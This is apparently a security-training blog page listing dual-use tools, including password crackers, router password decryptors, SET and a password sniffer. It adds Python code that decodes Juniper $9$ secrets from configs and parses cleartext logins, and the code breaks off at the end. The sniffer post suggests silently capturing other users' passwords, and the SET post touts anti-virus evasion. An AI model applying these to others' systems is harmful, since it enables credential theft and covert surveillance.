White Hat Hacker Capital: Buôn Ma Thuột

Vietnam White Hat Hacker training program in Buôn Ma Thuột city, combined with tourism. Arrive as a newbie, leave as a WHITE HAT HACKER!

Hacking and Penetration Testing with Metasploit

Security365's training program on using the Metasploit Framework for penetration testing (hacking).

C50 Computer Forensics Materials

Study materials on digital evidence investigation (CHFI), compiled by Security365 for training at C50.

Students, Hacking and Information Security

A student hacking competition, with web attack challenges for students built on the Hackademic Challenge platform.

Attack and Defense with BackTrack / Kali Linux

Attack and defense course using the professional hacker toolkits BackTrack and Kali Linux, based on Offensive Security content.


[DLink Password Decryptor] Tool to recover the Login Password of D-Link modem/router


DLink Password Decryptor is a free desktop tool to instantly recover the login password of a D-Link modem/router.

If you have lost the login password of your D-Link modem and you have a backup configuration file, you can use this tool to quickly get your password back.

It supports two modes of password recovery. You can either enter the encrypted D-Link password directly or specify the D-Link modem's backup configuration file. In the second case, it will automatically detect the login password in the config file and decrypt it instantly.

Note that it has been tested with a limited number of D-Link modems, including the latest model, the DSL-2750U, so it may or may not work with other models.

This is a very handy tool for all network administrators as well as penetration testers.
It has been successfully tested on both 32-bit and 64-bit Windows systems from Windows XP to Windows 8.

Screenshots

Screenshot 1: DLink Password Decryptor is showing the recovered Password from the encrypted D-Link Login Password


Screenshot 2: Showing Password recovered from the D-Link backup configuration file.

Download DLink Password Decryptor v1.0 
License  : Freeware
Platform : Windows XP, 2003, Vista, Windows 7, Windows 8

[Capsa Packet Sniffer] Portable Network Analysis Tool


Capsa is a free portable network analysis tool that lets network administrators monitor, diagnose and troubleshoot problems on their network. The free version of the analyzer comes with tons of features and is good enough for home use as well as for small businesses.
With Capsa Sniffer you can monitor and capture network data for up to 50 IP addresses.

Capsa features:
  • Traffic details for every host.
  • Bandwidth control (to find the hosts that are watching online video).
  • Network diagnostics to identify problems on the network.
  • Network activity logging (recording instant messaging and webmail).
  • Network behavior monitoring.

Download Capsa packet Sniffer

[HoneyProxy] A man-in-the-middle SSL Proxy & Traffic Analyzer



HoneyProxy is a lightweight tool that allows live HTTP(S) traffic inspection and analysis.
It focuses on features that are useful for malware analysis and network forensics.

Features

  • Analyze HTTP(S) traffic on the fly
  • Filter and highlight traffic, regex support included.
  • Report Generation for saved flows, including a live JS editor.
  • Save HTTP conversations for later analysis
  • Make scripted changes with Python, e.g. remove Cache Header.
  • based on and compatible with mitmproxy.
  • cross-platform (Windows, OS X and Linux)
  • SSL interception certs generated on the fly
Looking for more? Check out our GitHub wiki!


Quick Start

Download the latest release or pick a development snapshot.

Install all dependencies: pip install pyOpenSSL pyasn1 Twisted Autobahn
Windows users: Install the binaries for pyOpenSSL and Twisted manually (or compile yourself).
Ubuntu / Debian users: Install twisted as a package (sudo apt-get install python-twisted). If you get errors, check this page.

Start HoneyProxy with python honeyproxy.py or python honeyproxy.py --help.
If you don't use a modern browser, a kitten will die. We support both Firefox and Chrome!
Most command line parameters are documented in the mitmproxy docs.

[PunkSPIDER] Mass Vulnerability Search for Web Applications

Alejandro Caceres, CTO of Hyperion Gray, presented an interesting project called PunkSPIDER at ShmooCon 2013. It is an architecture built on Apache Hadoop clusters for a distributed scanner capable of performing thousands of web vulnerability scans per day and making the results available to anyone. In other words, PunkSPIDER is a large global search engine for web application vulnerabilities.

The goal of the project is to draw attention to the generally poor security of web applications. By simply entering a URL, it can help any organization find out whether its public site has critical vulnerabilities that need to be fixed immediately.

Of course, PunkSPIDER may also generate some controversy because, like many tools, it can be used for malicious purposes, that is, to discover and exploit vulnerabilities in other people's web applications. That said, remember that the scans are fairly automated and generic, and any attacker could already run similar ones in the phases preceding an intrusion...

You can download the source code, donate on Kickstarter and/or contact punkspider@hyperiongray.com if you want to collaborate with the project.


Source: http://www.hackplayers.com/

[Hash Kracker Console] Tool to find out the password from the Hash


Hash Kracker Console is an all-in-one command-line tool to find out the password behind a hash.


Currently it supports password recovery for the following popular hash types:
  • MD5
  • SHA1
  • SHA256
  • SHA384
  • SHA512

It also offers four password recovery methods, depending on the complexity of the password:
  • Dictionary Crack
  • Hybrid Crack
  • Brute-force Crack
  • Pattern based Brute-force Crack

Being a command-line tool makes it faster and easier to automate. It is a fully portable tool and also includes an installer.

It works on wide range of platforms starting from Windows XP to Windows 8.

Download Hash Kracker Console v1.0

[oclHashcat-lite v0.15] World's fastest NTLM, MD5, SHA1, SHA256 and descrypt cracker



Features

  • World's fastest NTLM, MD5, SHA1, SHA256 and descrypt cracker
  • Free
  • Multi-GPU (up to 128 gpus)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses on one-shot, lightweight hashes
  • Supports mixed GPU types
  • Supports markov attack
  • Supports mask attack
  • Supports distributed cracking
  • Supports pause / resume while cracking
  • Supports sessions
  • Supports restore
  • Supports hex-salt
  • Supports hex-charset
  • Integrated thermal watchdog
  • ... and much more

Algorithms

  • MD5
  • md5($pass.$salt)
  • Joomla
  • SHA1
  • nsldap, SHA-1(Base64), Netscape LDAP SHA
  • sha1($pass.$salt)
  • nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
  • Oracle 11g
  • MSSQL(2000)
  • MSSQL(2005)
  • MySQL
  • MD4
  • md4($pass.$salt)
  • NTLM
  • Domain Cached Credentials, mscash
  • SHA256
  • sha256($pass.$salt)
  • descrypt, DES(Unix), Traditional DES
  • SHA512
  • sha512($pass.$salt)
  • Cisco-PIX MD5
  • Double MD5
  • vBulletin < v3.8.5
  • vBulletin > v3.8.5
  • IPB2+, MyBB1.2+
  • LM
  • Oracle 7-10g, DES(Oracle)
  • SHA-3(Keccak)
  • Half MD5
  • NetNTLMv1-VANILLA / NetNTLMv1+ESS
  • NetNTLMv2
  • Cisco-IOS SHA256

Download here: http://adf.ly/145xZ2


type: driver
file: host programs
desc: added support for AMD ADL v5.0 library

type: feature
file: hashcat-cli
desc: added mode -m 5500 = NetNTLMv1-VANILLA / NetNTLMv1+ESS
trac: #51
trac: #96

type: feature
file: hashcat-cli
desc: added mode -m 5600 = NetNTLMv2
trac: #56

type: feature
file: kernels
desc: added -m 5700 = Cisco-IOS SHA256
cred: philsmd

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so that it accepts only 16 byte input, see next change why
trac: #89

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so it can crack middle and right portions, too (not just left)
trac: #89

type: bug
file: kernels
desc: fixed bug in NVidia version had to switch back to bitness-depending kernels

type: bug
file: kernels
desc: fixed bug in NVidia version writing to constant memory from kernel isnt allowed

type: bug
file: hashcat-cli
desc: fixed bug in benchmark-mode, do not run MD5 again at end

type: bug
file: hashcat-cli
desc: fixed bug in benchmark-mode, Memory stepping when doing a benchmark
trac: #57

[oclHashcat-plus v0.14] World's fastest md5crypt, phpass, mscash2 and WPA/WPA2 cracker




Features

  • World's fastest md5crypt, phpass, mscash2 and WPA/WPA2 cracker
  • World's first and only GPGPU-based rule engine
  • Free
  • Multi-GPU (up to 128 gpus)
  • Multi-Hash (up to 15 million hashes)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses on highly iterated modern hashes
  • Focuses on single-dictionary-based attacks
  • Supports mask attack
  • Supports distributed cracking
  • Supports pause / resume while cracking
  • Supports sessions
  • Supports restore
  • Supports reading words from file
  • Supports reading words from stdin
  • Supports hex-salt
  • Supports hex-charset
  • Integrated thermal watchdog
  • 30+ Algorithms implemented with performance in mind
  • ... and much more

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict

Download here: http://adf.ly/145xV8


[Hashcat v0.44] Advanced Password Recovery


Features

  • Multi-Threaded
  • Free
  • Multi-Hash (up to 24 million hashes)
  • Multi-OS (Linux, Windows and OSX native binaries)
  • Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
  • SSE2 accelerated
  • All Attack-Modes except Brute-Force and Permutation can be extended by rules
  • Very fast Rule-engine
  • Rules compatible with JTR and PasswordsPro
  • Possible to resume or limit session
  • Automatically recognizes recovered hashes from outfile at startup
  • Can automatically generate random rules
  • Load saltlist from external file and then use them in a Brute-Force Attack variant
  • Able to work in a distributed environment
  • Specify multiple wordlists or multiple directories of wordlists
  • Number of threads can be configured
  • Threads run on lowest priority
  • Supports hex-charset
  • Supports hex-salt
  • 30+ Algorithms implemented with performance in mind
  • ... and much more


Attack-Modes

  • Straight *
  • Combination *
  • Toggle-Case
  • Brute-Force
  • Permutation
  • Table-Lookup

Download here: http://adf.ly/143xLq

type: feature
file: hashcat-cli
desc: added mode -m 9999 = Plaintext
trac: #45

type: feature
file: hashcat-cli
desc: added mode -m 5500 = NetNTLMv1 + ESS
trac: #96

type: feature
file: kernels
desc: added -m 5700 = Cisco-IOS SHA256
cred: philsmd

type: change
file: hashcat-cli
desc: changed the hash-format for NetNTLMv1 and NetNTLMv2 to .lc format
cred: #98

type: bug
file: hashcat-cli
desc: fixed bug in 32 bit version, did not crack -m 1800 sha512crypt
trac: #92

type: bug
file: hashcat-cli
desc: fixed bug in NetNTLMv2 parser
trac: #95

[Juniper Password Decryptor] Tool to Decode and Recover Juniper $9$ Passwords


Juniper Password Decryptor is a free desktop tool to instantly decode and recover Juniper $9$ Passwords.

Juniper routers allow you to configure two types of passwords:
  • Juniper $1$ password: an MD5-based hash of the password is stored. It starts with $1$ and requires a brute-force technique to recover the password.
  • Juniper $9$ password: these passwords are encoded with Juniper's proprietary reversible algorithm. The string starts with $9$ and can be decoded instantly.

You can use the Juniper Password Decryptor tool to quickly decode these Juniper $9$ passwords.

It supports two modes of password recovery. You can either enter the encoded Juniper $9$ password directly or specify the Juniper router configuration file. In the second case, it will automatically detect the $9$ password in the config file and decode it instantly.


This is a very handy tool for all administrators as well as penetration testers.
It has been successfully tested on both 32-bit and 64-bit Windows systems from Windows XP to Windows 8.
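As an added worked example (my own code, not the tool's), here is the $9$ decoding in Python, together with the matching encoder so the round trip can be checked, and a helper that pulls every $9$ secret out of a configuration dump the way the tool's second mode does. The alphabet families, filler lengths and gap weights are taken from public reimplementations of the scheme (Crypt::Juniper and the like), not from this page; treat them as an assumption and confirm against a $9$ value from one of your own devices. The practical point: $9$ is obfuscation, not a hash, so anyone who can read the configuration (backups, TFTP servers, attachments in tickets) has the cleartext.

```python
import random
import re

# Added example, not the tool's code. Juniper $9$ "encrypted-password" values are a
# reversible obfuscation, not a hash. The tables below are as published in public
# reimplementations of the scheme (e.g. Crypt::Juniper); they are an assumption here.
MAGIC = "$9$"
FAMILY = ["QzF3n6/9CAtpu0O", "B1IREhcSyrleKvMW8LXx",
          "7N-dVbwsY2g4oaJZGUDj", "iHkq.mPf5T"]
# EXTRA[c] = number of filler characters that follow salt character c
EXTRA = {c: 3 - i for i, fam in enumerate(FAMILY) for c in fam}
NUM_ALPHA = "".join(FAMILY)                          # index -> character (65 symbols)
ALPHA_NUM = {c: i for i, c in enumerate(NUM_ALPHA)}  # character -> index
# Each plaintext byte is split into "gaps" weighted by one of these rows; the row
# used cycles with the plaintext position.
ENCODING = [[1, 4, 32], [1, 16, 32], [1, 8, 32], [1, 64], [1, 32],
            [1, 4, 16, 128], [1, 32, 64]]


def _gap(c1, c2):
    """Forward distance from c1 to c2 around the alphabet, minus one."""
    return (ALPHA_NUM[c2] - ALPHA_NUM[c1]) % len(NUM_ALPHA) - 1


def decrypt(crypt):
    """Decode a $9$ string back to the cleartext password."""
    if not crypt.startswith(MAGIC) or len(crypt) <= len(MAGIC):
        raise ValueError("not a $9$ string")
    chars = crypt[len(MAGIC):]
    salt, chars = chars[0], chars[1:]
    if salt not in EXTRA or any(c not in ALPHA_NUM for c in chars):
        raise ValueError("character outside the $9$ alphabet")
    chars = chars[EXTRA[salt]:]            # skip the filler after the salt
    prev = salt
    plain = ""
    while chars:
        weights = ENCODING[len(plain) % len(ENCODING)]
        nibble, chars = chars[:len(weights)], chars[len(weights):]
        if len(nibble) != len(weights):
            raise ValueError("truncated $9$ string")
        gaps = []
        for c in nibble:
            gaps.append(_gap(prev, c))
            prev = c
        plain += chr(sum(g * w for g, w in zip(gaps, weights)) % 256)
    return plain


def encrypt(plain, salt=None, filler=None):
    """Encode cleartext as a $9$ string. salt/filler are only fixed for testing."""
    salt = salt or random.choice(NUM_ALPHA)
    if filler is None:
        filler = "".join(random.choice(NUM_ALPHA) for _ in range(EXTRA[salt]))
    if len(filler) != EXTRA[salt]:
        raise ValueError("salt %r needs %d filler characters" % (salt, EXTRA[salt]))
    crypt = MAGIC + salt + filler
    prev = salt
    for pos, ch in enumerate(plain):
        value = ord(ch)
        if value > 255:
            raise ValueError("only single-byte characters are supported")
        weights = ENCODING[pos % len(ENCODING)]
        gaps = []
        for w in reversed(weights):        # most significant weight first
            gaps.insert(0, value // w)
            value %= w
        for g in gaps:
            prev = NUM_ALPHA[(ALPHA_NUM[prev] + 1 + g) % len(NUM_ALPHA)]
            crypt += prev
    return crypt


# Matches "encrypted-password" values as they appear in a JunOS configuration.
SECRET_RE = re.compile(r"\$9\$[A-Za-z0-9./-]+")


def find_9_passwords(config_text):
    """Return (encoded, decoded) pairs for every $9$ secret in a config dump."""
    return [(m, decrypt(m)) for m in SECRET_RE.findall(config_text)]


if __name__ == "__main__":
    # Constructed config line; "$9$QQQQF3/" is the encoding of the single letter "A".
    sample = 'user admin { authentication { encrypted-password "$9$QQQQF3/"; } }'
    for enc, dec in find_9_passwords(sample):
        print(enc, "->", dec)
    print(decrypt(encrypt("juniper123")))
```

The salt character decides how many filler characters follow it, and every encoded character is a distance from the previous one, which is why the same password encodes differently each time while still decoding uniquely.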

Screenshots

Screenshot 1: Juniper Password Decryptor is showing the recovered Password from the encrypted Juniper $9$ Password

Screenshot 2: Showing Password recovered from the Juniper configuration file.

Download Juniper Password Decryptor v1.0
License  : Freeware
Platform : Windows XP, 2003, Vista, Windows 7, Windows 8

[Dexter] A Free Tool for Mobile (Android) Malware Analysis


Bluebox Labs has just released Dexter, a free tool intended to help information security professionals and malware analysts analyze Android mobile applications in order to find malware and vulnerabilities.


Dexter combines manual and automatic static program analysis to provide a better understanding of an Android application. Since the original application source code is not required, Dexter is useful during third party binary application analyses and malware reverse engineering.


The following core features are provided to the analyst:
  • App statistics and direct access to all program entry points
  • Package graph visualization
  • Class and inheritance diagrams
  • Class decompilation
  • Method bytecode graph visualization
  • A relational query language and text search feature
  • APK file browser
  • Coloring, tagging and commenting on package, class, method and even basic block layer
  • String listing including code cross reference resolution
  • Automated semantic annotation of program elements
  • Integrated multi-user support for collaboration

More info here.

[WhatWeb] Website Fingerprinting Scanner


WhatWeb is a tool that lets us fingerprint a website.


WhatWeb is notable for identifying sites built with one of the most popular CMSs such as WordPress, Joomla!, phpBB or Drupal; it can also identify JavaScript library versions, geolocate domains, identify HTML tags and web servers, and has more than 900 plugins to extend its functionality.


For anyone who has never used this tool and wants to start getting into the reconnaissance and fingerprinting phases, the first step is to use WhatWeb.

Download WhatWeb
GitHub repository
Author's website
The WhatWeb Wiki

[Converter v0.7] Analyzing and Deobfuscating Malicious Scripts



Malicious Java applets have been making news for a while, so I thought I would update Converter to include some new features to help with deobfuscating them.


This is a list of changes made to this version:
+ Replaced Binary-to/from-Text with Binary-to/from-Hex to make it more useful
+ Added Filter > “Keep Hex” to only keep hex characters
+ Added Format > “Mixed Octal to Hex” to convert a mixture of text and octal to hex
+ Added Format > “Sort Text” to sort a string
+ Added Format > “Hex Format – CSV” separates hex values with a comma
+ Added Tools > “String Builder” to keep values between quotes
+ Modified “Dec-to-Hex” and “Dec-to-Octal” to handle negative integers
+ Added “copy output to input” option to Secret Decoder Ring
+ Added ability to import first KB (or all) of data to Key Search/Convert
+ Eliminated extra fields in Key Search/Convert screen
+ Made expression capability in Key Search/Convert and Convert Binary File a little more robust (added Extra > “Expressions Help”)


Here's a look at some of the features in action (screenshots omitted).

The first applet used binary strings to hide its actions. Just paste the string in and the Binary-to-Hex feature will split it on every eight characters and convert each group to hex. You can choose the output format using the dropdown at the bottom.

The second applet concatenates several variables together before it deobfuscates the result. Using the "String Builder" feature, paste the section in and Converter will concatenate everything between the quotes. Make sure the beginning and ending quotes are present.

Another applet uses a mix of text and octal characters. The "Mixed Octal to Hex" feature converts the string (including the escaped characters) to hex.

Another applet uses an array of positive and negative integers; Converter now converts decimal to hex properly, negative values included.

This particular applet takes the concatenated string and deobfuscates it by running it through a decoder routine three times. The Secret Decoder Ring now lets you copy the output to the input field, so you can decode it any number of times without having to copy and paste manually each time.

Finally, the Key Search/Convert screen has been reworked; I tried to make the expressions as flexible as possible.
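The operations walked through above, as an added Python example (my own code, not Converter's): each function reproduces one of the features on constructed applet fragments, so the same deobfuscation can be scripted over many samples instead of pasted one at a time.

```python
import re

# Added example, not Converter's own code: the operations described above, on
# constructed applet fragments, so the same deobfuscation can be scripted.


def binary_to_bytes(text):
    """Binary-to-Hex: keep only 0/1, split every eight bits, return the bytes."""
    bits = re.sub(r"[^01]", "", text)
    if len(bits) % 8:
        raise ValueError("bit string length %d is not a multiple of 8" % len(bits))
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def string_builder(source):
    """String Builder: concatenate everything between double quotes, in order."""
    return "".join(re.findall(r'"((?:[^"\\]|\\.)*)"', source))


def mixed_octal_to_bytes(text):
    """Mixed Octal to Hex: decode \\NNN octal escapes, keep other characters as-is."""
    out = bytearray()
    i = 0
    while i < len(text):
        m = re.match(r"\\([0-7]{1,3})", text[i:])
        if m:
            out.append(int(m.group(1), 8) & 0xFF)
            i += len(m.group(0))
        else:
            out.extend(text[i].encode("latin-1"))
            i += 1
    return bytes(out)


def signed_ints_to_bytes(values):
    """Dec-to-Hex with negatives: Java bytes are signed, so -1 is 0xFF and -58 is 0xC6."""
    return bytes(v & 0xFF for v in values)


def keep_hex(text):
    """Filter > Keep Hex: strip everything that is not a hex digit."""
    return re.sub(r"[^0-9A-Fa-f]", "", text)


def to_hex(data, csv=False):
    """Hex Format: plain hex string, or comma-separated bytes when csv is set."""
    return ",".join("%02x" % b for b in data) if csv else data.hex()


if __name__ == "__main__":
    # Constructed fragments in the style of the applets above, not real samples.
    print(binary_to_bytes("01101000 01110100 01110100 01110000 00111010"))  # b'http:'
    print(string_builder('String s = "ht" + "tp" + ":/" + "/x";'))           # http://x
    print(mixed_octal_to_bytes(r"\150\164tp:\057\057"))                       # b'http://'
    print(signed_ints_to_bytes([104, 116, 116, 112, -58]))                   # b'http\xc6'
    print(to_hex(bytes.fromhex(keep_hex("48 54 54 50 (HTTP)")), csv=True))   # 48,54,54,50
```

Chaining these is the usual workflow: build the string, decode the escapes to bytes, then feed the bytes to whatever decoder routine the applet applies.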

Download Converter v0.7
Official website: http://www.kahusecurity.com/

[JoomlaScan v1.5] Scanner for finding vulnerabilities in Joomla

This new update of JoomlaScan recognizes Joomla! version 3.1.0-beta1, as well as the latest 2.5.x and the first 3.0.x releases.


Since version 2.5, identifying the Joomla! version comes down to requesting a single file, http://tu.joomla.com/administrator/manifests/files/joomla.xml, where the exact version can be found:
<version>3.0.3</version>

Although it is true that in earlier versions this could be a headache, requiring analysis of the existence and/or contents of different files that appear and disappear in new revisions, all of which requires studying the Joomla! repositories first.

Taking advantage of the rework, I have also added some new exploits, obtaining the links from http://www.exploit-db.com and http://www.securityfocus.com

Download: http://adf.ly/1461Oy

Or, if you already have it installed:
$ perl joomlascan.pl -update

Author's website: http://blog.pepelux.org/
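As an added example covering both the WhatWeb post above and the Joomla! manifest check described here (my own code, not either project's): a minimal fingerprinter that matches generator tags and well-known paths in a page body, plus a parser for the joomla.xml manifest. The signature table is a deliberately small illustration rather than WhatWeb's plugin set, and the sample responses are constructed, not captured from a real site.

```python
import re
import xml.etree.ElementTree as ET

# Added example: a small CMS fingerprinter in the spirit of WhatWeb, plus the
# Joomla manifest check used by JoomlaScan. SIGNATURES is my own simplified
# table, not WhatWeb's plugin database.
SIGNATURES = {
    "WordPress": [r"/wp-content/", r"/wp-includes/",
                  r'<meta name="generator" content="WordPress'],
    "Joomla": [r"/media/jui/", r"/media/system/js/",
               r'<meta name="generator" content="Joomla'],
    "Drupal": [r"Drupal\.settings", r"/sites/default/files/",
               r'<meta name="generator" content="Drupal'],
    "phpBB": [r"phpBB", r"/styles/prosilver/"],
}


def fingerprint(headers, html):
    """Return {product: [matched evidence]} for the headers and body of one page."""
    found = {}
    for product, patterns in SIGNATURES.items():
        hits = [p for p in patterns if re.search(p, html, re.IGNORECASE)]
        if hits:
            found[product] = hits
    # Server-side headers are evidence in their own right (web server, language).
    for h in ("Server", "X-Powered-By", "X-Generator"):
        v = headers.get(h)
        if v:
            found.setdefault("headers", []).append("%s: %s" % (h, v))
    return found


def generator_version(html):
    """Version string from the generator meta tag, e.g. 'WordPress 3.5.1', or None."""
    m = re.search(r'<meta name="generator" content="([^"]+)"', html, re.IGNORECASE)
    return m.group(1) if m else None


def joomla_version_from_manifest(xml_text):
    """Read <version> from /administrator/manifests/files/joomla.xml (Joomla >= 2.5)."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    node = root.find("version")
    return node.text.strip() if node is not None and node.text else None


if __name__ == "__main__":
    # Constructed responses, not captured from a real site.
    wp_html = ('<html><head><meta name="generator" content="WordPress 3.5.1" />'
               '<link rel="stylesheet" href="/wp-content/themes/x/style.css">'
               '</head></html>')
    print(fingerprint({"Server": "Apache/2.2.22", "X-Powered-By": "PHP/5.3.10"}, wp_html))
    print(generator_version(wp_html))
    manifest = ('<?xml version="1.0" encoding="UTF-8"?>'
                '<extension version="3.0" type="file"><name>files_joomla</name>'
                '<version>3.0.3</version></extension>')
    print(joomla_version_from_manifest(manifest))   # 3.0.3
```

In practice the manifest is fetched with a plain HTTP GET; it is world-readable on a default install, which is exactly why it makes such a reliable version oracle.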

[L517] Simple WordList Generator for Windows

L517 is a word-list generator for the Windows Operating System.

I wrote L517 to be the only word-list generator and editor I would ever need. L517 is small (considering what it does), it is fast (considering it's a Windows app), and it is lightweight (when not loading astronomically large lists). A user-friendly GUI requires no memorization of command-line arguments!

L517 contains hundreds of options for generating a large, personalized, and/or generic wordlist. With L517, you can generate phone numbers, dates, or every possible password with only a few clicks of the keyboard; all the while, filtering unwanted passwords. 
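As an added example (my own code, not L517's): the kinds of transformations a wordlist generator applies, written as Python generators so they can be piped straight into a cracker instead of being written out as an astronomically large file. The leetspeak table and the filter policy are my own assumptions.

```python
import itertools
from datetime import date, timedelta

# Added example, not L517's code: a few of the transformations a wordlist generator
# applies, written as generators so they can be piped into a cracker instead of being
# written out. The leetspeak table and filter policy are my own assumptions.
LEET = {"a": "4@", "e": "3", "i": "1!", "o": "0", "s": "5$", "t": "7"}


def case_mutations(word):
    """lower, UPPER, Capitalized and iNVERTED forms, duplicates removed."""
    forms = (word.lower(), word.upper(), word.capitalize(), word.capitalize().swapcase())
    seen = []
    for w in forms:
        if w not in seen:
            seen.append(w)
    return seen


def leet_mutations(word):
    """Every combination of leetspeak substitutions; the original letter stays an option."""
    options = [(c,) + tuple(LEET.get(c.lower(), "")) for c in word]
    return ["".join(p) for p in itertools.product(*options)]


def dates(start, end, fmts=("%d%m%Y", "%d%m%y", "%Y%m%d", "%d-%m-%Y")):
    """Every calendar day from start to end (ISO strings, inclusive) in each format."""
    day, last = date.fromisoformat(start), date.fromisoformat(end)
    while day <= last:
        for f in fmts:
            yield day.strftime(f)
        day += timedelta(days=1)


def phone_numbers(prefix, digits):
    """All numbers prefix + <digits> digits, e.g. every subscriber number in one area code."""
    for n in range(10 ** digits):
        yield prefix + str(n).zfill(digits)


def filtered(words, min_len=8, max_len=16, require_digit=False):
    """Drop candidates the target's password policy would reject anyway."""
    for w in words:
        if min_len <= len(w) <= max_len and (not require_digit or any(c.isdigit() for c in w)):
            yield w


if __name__ == "__main__":
    print(case_mutations("secret"))
    print(len(leet_mutations("passes")))                       # 162
    print(list(dates("2013-03-16", "2013-03-17"))[:4])
    print(sum(1 for _ in filtered(phone_numbers("0262", 4))))  # 10000
```

Filtering early matters more than it looks: leetspeak alone multiplies a six-letter word by over a hundred candidates, and most of them violate the length or complexity rules the target enforces.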

Changes

  • v0.8 : Language support for French, German, and Spanish; available in HELP menu.
  • v0.7 : Customizable 'leetspeak' case mutations.
  • v0.6 : Paste (Ctrl+V) in the EDIT menu; various bug fixes.
  • v0.5 : Corrected case bugs.
  • v0.4 : Fixed RICHTX32.OCX error; Removed RichTextControl from project -- replaced with built-in Microsoft Word API's for .doc files.
  • v0.3 : New 'phone number' generation option; Generate based on charset; Two new cases; Split files every # of items.
  • v0.2 : 'Analyzer' option; Fixed bugs; More help documentation.
  • v0.1 : First public release




[SET v4.7] The Social-Engineer Toolkit

SET update
The Social-Engineer Toolkit (SET) version 4.7, codename “Headshot”, has been released. This version of SET introduces the ability to specify multi-PowerShell injection, which allows you to specify as many ports as you want; SET will automatically inject PowerShell onto the system on all of the reverse ports outbound. What's nice about this technique is that it never touches disk and also uses already whitelisted processes, so it should never trigger anything like anti-virus or whitelisting/blacklisting tools. In addition to the multi-PowerShell injector, there are a total of 30 new features and a large rewrite of how SET handles passing information between different modules.

Change log for version 4.7
  • removed a prompt that would come up when using the powershell injection technique, port.options is now written in prep.py versus a second prompt with information that was already provided
  • began an extremely large project of centralizing the SET config file by moving all of the options to the set.options file under src/program_junk
  • moved all port.options to the central routine file set.options
  • moved all ipaddr.file to the central routine file set.options
  • changed spacing on when launching the SET web server
  • changed the wording to reflect what operating systems this was tested on versus browsers
  • removed an un-needed print option1 within smtp_web that was reflecting a message back to user
  • added the updated java bean jmx exploit that was updated in Metasploit
  • added ability to specify a username list for the SQL brute forcing, can either specify sa, other usernames, or a filename with usernames in it
  • added new feature called multi-powershell-injection – configurable in the set config options, allows you to use powershell to do multiple injection points and ports. Useful in egress situations where you don’t know which port will be allowed outbound.
  • enabled multi-pyinjection through java applet attack vector, it is configured through set config
  • removed check for static powershell commands, will load regardless – if not installed user will not know regardless – better if path variables aren’t the same
  • fixed a bug that would cause linux and osx payloads to be selected even when disabled
  • fixed a bug that would cause the meta_config file to be empty if selecting powershell injection
  • added automatic check for Kali Linux to detect the default moved Metasploit path
  • removed a tail comma from the new multi injector which was causing it to error out
  • added new core routine check_ports(filename, ports) which will do a compare to see if a file already contains a metasploit LPORT (removes duplicates)
  • added new check to remove duplicates into multi powershell injection
  • made the new powershell injection technique compliant with the multi pyinjector – both payloads work together now
  • added encrypted and obfuscated jar files to SET, will automatically push new repos to git every day.
  • rewrote the java jar file to handle multiple powershell alphanumeric shellcode points injected into applet.
  • added signed and unsigned jar files to the java applet attack vector
  • removed create_payload.py from saving files in src/html and instead in the proper folders src/program_junk
  • fixed a payload duplication issue in create_payload.py, will now check to see if port is there
  • removed a pefile check unless backdoored executable is in use
  • turned digital signature stealing from a pefile to off in the set_config file
  • converted all src/html/msf.exe to src/program_junk/ and fixed an issue where the applet would not load properly
It can also be downloaded through github using the following command: 
git clone http://adf.ly/1461HR

[Password Sniffer Console] Password Sniffing Tool to capture Email, Web and FTP login passwords


Password Sniffer Console is an all-in-one command-line password sniffing tool to capture email, web and FTP login passwords passing through the network.

It automatically detects the login packets on the network for various protocols and instantly decodes the passwords.

Here is the list of supported protocols:
  • HTTP (Basic authentication)
  • FTP
  • POP3
  • IMAP
  • SMTP

In addition to recovering your own lost passwords, you can use this tool in the following scenarios:
  • Run it on a gateway system that all of your network's traffic passes through.
  • In a MITM attack, run it on the middle system to capture the passwords from the target system.
  • On a multi-user system, run it under an Administrator account to silently capture passwords for all users.
It includes an installer which installs WinPcap, the network capture driver required for sniffing. For Windows 8, you first have to manually install the WinPcap driver (in Windows 7 compatibility mode) and then run the installer to install only Password Sniffer Console.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.
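An added example (my own code, not Password Sniffer Console's) showing what these cleartext logins look like on the wire and how a sniffer recovers them: for each listed protocol, the credential-bearing command is parsed out of a constructed client-to-server payload. The same patterns, with the same base64 decoding, are what you would grep for in a capture to confirm that a service is still accepting unencrypted logins.

```python
import base64
import re

# Added example, not the tool's code: how cleartext logins look on the wire for the
# protocols listed above, parsed from constructed (not captured) TCP payloads.


def http_basic(payload):
    """HTTP Basic: 'Authorization: Basic base64(user:pass)' in the request headers."""
    m = re.search(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", payload, re.M | re.I)
    if not m:
        return None
    try:
        user, _, pw = base64.b64decode(m.group(1)).decode("latin-1").partition(":")
    except ValueError:                       # bad base64 padding
        return None
    return ("http-basic", user, pw)


def user_pass(payload, proto):
    """FTP and POP3 send 'USER x' then 'PASS y' as separate cleartext commands."""
    u = re.search(r"^USER\s+(\S+)", payload, re.M | re.I)
    p = re.search(r"^PASS\s+(\S+)", payload, re.M | re.I)
    return (proto, u.group(1), p.group(1)) if u and p else None


def imap_login(payload):
    """IMAP: '<tag> LOGIN user pass' (arguments may be quoted)."""
    m = re.search(r'^\S+\s+LOGIN\s+"?([^"\s]+)"?\s+"?([^"\s]+)"?', payload, re.M | re.I)
    return ("imap", m.group(1), m.group(2)) if m else None


def smtp_auth(payload):
    """SMTP AUTH PLAIN: base64 of '\\0user\\0pass'; AUTH LOGIN: user then pass, each base64."""
    m = re.search(r"^AUTH PLAIN\s+([A-Za-z0-9+/=]+)", payload, re.M | re.I)
    if m:
        parts = base64.b64decode(m.group(1)).decode("latin-1").split("\0")
        if len(parts) == 3:
            return ("smtp-plain", parts[1], parts[2])
    # Only the client side is shown here; the server's 334 prompts sit between these lines.
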